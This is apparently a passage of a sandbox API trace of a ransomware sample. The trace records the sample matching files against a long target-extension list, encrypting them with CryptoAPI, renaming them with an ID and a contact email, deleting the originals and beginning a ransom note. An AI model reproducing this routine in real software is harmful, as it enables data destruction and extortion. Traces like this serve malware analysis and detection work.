	[0183.640] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.640] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.643] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3473, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x3473, lpOverlapped=0x0) returned 1
	[0183.645] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.645] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0183.647] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.647] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.648] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.648] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.648] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.648] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8ef0) returned 1
	[0183.648] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.648] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x3473, dwBufLen=0x3473 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x3480) returned 1
	[0183.649] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.649] RtlMoveMemory (in: Destination=0xfe0600, Source=0xfdd180, Length=0x3473 | out: Destination=0xfe0600) 
	[0183.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.649] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0600*, pdwDataLen=0x18aefc*=0x3473, dwBufLen=0x3480 | out: pbData=0xfe0600*, pdwDataLen=0x18aefc*=0x3480) returned 1
	[0183.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.650] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0183.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.650] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0183.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.651] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0183.651] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.651] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.651] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.654] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0183.655] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.655] WriteFile (in: hFile=0x390, lpBuffer=0xfe0600*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe0600*, lpNumberOfBytesWritten=0x18b358*=0x3480, lpOverlapped=0x0) returned 1
	[0183.658] CloseHandle (hObject=0x390) returned 1
	[0183.659] CloseHandle (hObject=0x388) returned 1
	[0183.659] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg")) returned 1
	[0183.662] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg")) returned 0
	[0183.662] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcda57de0, ftCreationTime.dwHighDateTime=0x1d96c87, ftLastAccessTime.dwLowDateTime=0x3fbad90, ftLastAccessTime.dwHighDateTime=0x1d970fe, ftLastWriteTime.dwLowDateTime=0x3fbad90, ftLastWriteTime.dwHighDateTime=0x1d970fe, nFileSizeHigh=0x0, nFileSizeLow=0x1898a, dwReserved0=0x0, dwReserved1=0x0, cFileName="xs8rF2qg_HA6YKeA1JeT.gif", cAlternateFileName="XS8RF2~1.GIF")) returned 1
	[0183.662] lstrcmpW (lpString1="xs8rF2qg_HA6YKeA1JeT.gif", lpString2="..") returned 1
	[0183.663] lstrcmpW (lpString1="xs8rF2qg_HA6YKeA1JeT.gif", lpString2=".") returned 1
	[0183.663] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.663] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="xs8rF2qg_HA6YKeA1JeT.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\xs8rF2qg_HA6YKeA1JeT.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\xs8rF2qg_HA6YKeA1JeT.gif"
	[0183.663] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\xs8rF2qg_HA6YKeA1JeT.gif") returned 65
	[0183.663] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.663] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\xs8rF2qg_HA6YKeA1JeT.gif", cchLength=0x41 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif") returned 0x41
	[0183.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.663] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.664] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif"
	[0183.664] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif") returned 65
	[0183.664] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.664] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0183.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.665] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.665] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.665] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.665] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.667] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1898a, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1898a, lpOverlapped=0x0) returned 1
	[0183.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.672] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0183.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.674] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.674] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.674] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9470) returned 1
	[0183.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.675] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1898a, dwBufLen=0x1898a | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x18990) returned 1
	[0183.678] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.678] RtlMoveMemory (in: Destination=0xff5b18, Source=0xfdd180, Length=0x1898a | out: Destination=0xff5b18) 
	[0183.678] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.678] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5b18*, pdwDataLen=0x18aefc*=0x1898a, dwBufLen=0x18990 | out: pbData=0xff5b18*, pdwDataLen=0x18aefc*=0x18990) returned 1
	[0183.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.680] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0183.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.680] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0183.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.680] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0183.680] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.681] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.681] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.681] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.683] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 107
	[0183.683] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.684] WriteFile (in: hFile=0x390, lpBuffer=0xff5b18*, nNumberOfBytesToWrite=0x18990, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff5b18*, lpNumberOfBytesWritten=0x18b358*=0x18990, lpOverlapped=0x0) returned 1
	[0183.691] CloseHandle (hObject=0x390) returned 1
	[0183.691] CloseHandle (hObject=0x388) returned 1
	[0183.691] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif")) returned 1
	[0183.702] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\xs8rf2qg_ha6ykea1jet.gif")) returned 0
	[0183.702] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcda57de0, ftCreationTime.dwHighDateTime=0x1d96c87, ftLastAccessTime.dwLowDateTime=0x3fbad90, ftLastAccessTime.dwHighDateTime=0x1d970fe, ftLastWriteTime.dwLowDateTime=0x3fbad90, ftLastWriteTime.dwHighDateTime=0x1d970fe, nFileSizeHigh=0x0, nFileSizeLow=0x1898a, dwReserved0=0x0, dwReserved1=0x0, cFileName="xs8rF2qg_HA6YKeA1JeT.gif", cAlternateFileName="XS8RF2~1.GIF")) returned 0
	[0183.702] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0183.702] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0183.703] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk"
	[0183.703] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*"
	[0183.703] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.703] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.703] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.TXT") returned 68
	[0183.703] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
